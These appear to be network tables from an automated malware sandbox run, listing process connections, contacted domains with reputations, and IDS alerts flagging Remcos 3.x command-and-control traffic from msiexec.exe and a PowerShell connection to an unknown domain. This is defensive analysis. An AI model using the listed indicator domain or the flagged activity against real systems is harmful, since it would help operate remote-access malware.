4808 | msiexec.exe | GET | 200 | 142.250.185.195:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1268 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5400 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1044 | powershell.exe | 188.114.97.3:443 | intunuishere.com | CLOUDFLARENET | NL | unknown |
1268 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 23.216.77.36:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
3944 | svchost.exe | 20.190.160.64:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
intunuishere.com |
| unknown |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2200 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2200 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
4808 | msiexec.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |
4808 | msiexec.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Checkin |